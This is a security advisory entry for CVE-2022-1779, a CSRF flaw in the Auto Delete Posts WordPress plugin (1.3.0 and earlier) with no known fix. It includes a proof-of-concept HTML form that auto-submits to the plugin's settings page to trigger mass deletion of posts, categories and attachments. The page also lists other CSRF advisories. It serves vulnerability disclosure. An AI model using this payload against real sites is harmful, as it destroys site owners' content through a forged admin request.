Auto Delete Posts <= 1.3.0 – Arbitrary Settings Update via CSRF | CVE 2022-1779 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack and delete specific posts, categories and attachments at once.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/options-general.php?page=auto-delete-posts.php" method="POST">
    <input type="text" name="DelPostType" value="7">
    <input type="text" name="DeleteAttachments" value="9">
    <input type="text" name="DeleteCategory[]" value="1">
    <input type="text" name="PerPostOrSite" value="5">
    <input type="text" name="PostAction" value="2">
    <input type="text" name="PostAge" value=" 1">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

auto-delete-posts

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

45117646-88ff-41d4-8abd-e2f18d4b693e

Timeline

Publicly Published

2022-05-23 (about 3 years ago)

Added

2022-05-23 (about 3 years ago)

Last Updated

2023-02-15 (about 2 years ago)

Other

Published

Title

Published

2025-05-07

Title

Beacon Lead Magnets and Lead Capture < 1.5.9 - Cross-Site Request Forgery

Published

2025-06-05

Title

Layouts for Elementor <= 1.11 - Cross-Site Request Forgery

Published

2025-01-17

Title

ShipWorks Connector for Woocommerce < 5.2.6 - Cross-Site Request Forgery to Service Password/Username Update

Published

2025-01-27

Title

Post Carousel Slider <= 2.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2024-12-12

Title

Like in Vk.com <= 0.5.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting